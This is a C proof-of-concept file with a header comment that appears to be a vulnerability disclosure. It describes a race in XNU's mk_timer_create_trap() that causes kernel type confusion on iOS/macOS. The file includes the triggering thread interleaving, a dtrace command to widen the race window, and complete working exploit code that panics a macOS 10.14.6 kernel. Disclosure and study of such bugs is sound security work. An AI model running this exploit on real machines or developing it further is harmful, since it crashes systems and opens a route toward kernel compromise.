// Brandon Azad
#if 0
iOS/macOS: Race in XNU's mk_timer_create_trap() can lead to type confusion

Several comments in files related to Mach IPC describe possible type confusions related to
transmitting a receive right designating an ipc_port with an associated kobject when handled by the
IPC importance code. Unfortunately, a race condition in the creation of mk_timer objects (which are
exposed to userspace as receive rights) makes it possible for a mk_timer object to reuse a port
with an existing port death notification, which allows us to trigger this type confusion.

Here's the code of mk_timer_create_trap(), from osfmk/kern/mk_timer.c:

	mach_port_name_t
	mk_timer_create_trap(
		__unused struct mk_timer_create_trap_args *args)
	{
	...
	
		timer = (mk_timer_t)zalloc(mk_timer_zone);
		if (timer == NULL)
			return (MACH_PORT_NULL);
	
		result = mach_port_allocate_qos(myspace, MACH_PORT_RIGHT_RECEIVE,
		                                &mk_timer_qos, &name);
		if (result == KERN_SUCCESS)
			result = ipc_port_translate_receive(myspace, name, &port);
	
	...
	
		return (name);
	}

The problem is that the function mach_port_allocate_qos() allocates a port and port name but
returns only the port name, leaving the port unlocked and held alive only by the reference in the
task's IPC table. Thus, by the time ipc_port_translate_receive() is used to retrieve the underlying
ipc_port object, another thread could have come in and changed the port to which the name refers.

In order to trigger the issue, you'd need to get 2 threads to interleave as follows:

	Thread 1                                        Thread 2
	mach_port_allocate_qos(myspace,
	        MACH_PORT_RIGHT_RECEIVE,
	        &mk_timer_qos, &name);
	                                                mach_port_destroy(
	                                                        mach_task_self(), name);
	                                                mach_port_insert_right(
	                                                        mach_task_self(),
	                                                        name, replacer_port,
	                                                        MACH_MSG_TYPE_MOVE_RECEIVE);
	ipc_port_translate_receive(
	        myspace, name, &port);

The replacer_port in the example would be a receive right to an ipc_port with a port death
notification in place. That way, when mk_timer_create_trap() calls ipc_port_translate_receive() to
convert the port name into the ipc_port, it will get a port with the replacement port with the port
death notification rather than the one originally allocated.

Winning this race seems tricky but I believe it could be accomplished without too much difficulty.

The attached POC should trigger a kernel panic when run on macOS 10.14.6. To make the race easier
to win, run the attached dtrace script in another shell.

	$ sudo dtrace -w -s mk_timer-race.dtrace

	$ ./mk_timer-race
	A_recv = a03
	B_recv = b03
	T_recv_1 = c07
	mach_port_destroy(c07): 0
	mach_port_insert_right(a03->c07): 0
	mk_timer_create(): c07
	done
#endif

#include <assert.h>
#include <mach/mach.h>
#include <pthread.h>
#include <stdbool.h>
#include <stdio.h>
#include <unistd.h>

extern mach_port_t mk_timer_create(int dummy);

mach_port_t A_recv;
mach_port_t B_recv;
mach_port_t T_recv_1;
mach_port_t T_recv_2;
_Atomic bool racer_ready = false;
_Atomic bool racer_go = false;

void *thread_1(void *arg) {
	kern_return_t kr;

	while (!racer_ready) {}

	kr = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &A_recv);
	assert(kr == KERN_SUCCESS);
	printf("A_recv = %x\n", A_recv);

	kr = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &B_recv);
	assert(kr == KERN_SUCCESS);
	printf("B_recv = %x\n", B_recv);

	mach_port_t old_notify;
	kr = mach_port_request_notification(mach_task_self(), A_recv,
			MACH_NOTIFY_PORT_DESTROYED, 0, B_recv,
			MACH_MSG_TYPE_MAKE_SEND_ONCE, &old_notify);
	assert(kr == KERN_SUCCESS);
	assert(old_notify == MACH_PORT_NULL);

	kr = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &T_recv_1);
	assert(kr == KERN_SUCCESS);
	kr = mach_port_destroy(mach_task_self(), T_recv_1);
	assert(kr == KERN_SUCCESS);
	T_recv_1 = (T_recv_1 & 0xffffff00) | ((T_recv_1 + 4) & 0xff);
	printf("T_recv_1 = %x\n", T_recv_1);

	racer_go = true;

	T_recv_2 = mk_timer_create(0);

	printf("mk_timer_create(): %x\n", T_recv_2);

	return NULL;
}

void *thread_2(void *arg) {
	kern_return_t kr1 = -1, kr2 = -1;

	racer_ready = true;

	while (!racer_go) {}

	for (int i = 0; i < 3; i++) {
		close(-1);
	}

	kr1 = mach_port_destroy(mach_task_self(), T_recv_1);

	if (kr1 == KERN_SUCCESS) {
		kr2 = mach_port_insert_right(mach_task_self(), T_recv_1,
				A_recv, MACH_MSG_TYPE_MOVE_RECEIVE);
	}

	printf("mach_port_destroy(%x): %d\n", T_recv_1, kr1);
	printf("mach_port_insert_right(%x->%x): %d\n", A_recv, T_recv_1, kr2);

	return NULL;
}

int main() {
	pthread_t th2;
	pthread_create(&th2, NULL, thread_2, NULL);
	thread_1(NULL);
	pthread_join(th2, NULL);
	printf("done\n");
	sleep(2);
	return 0;
}
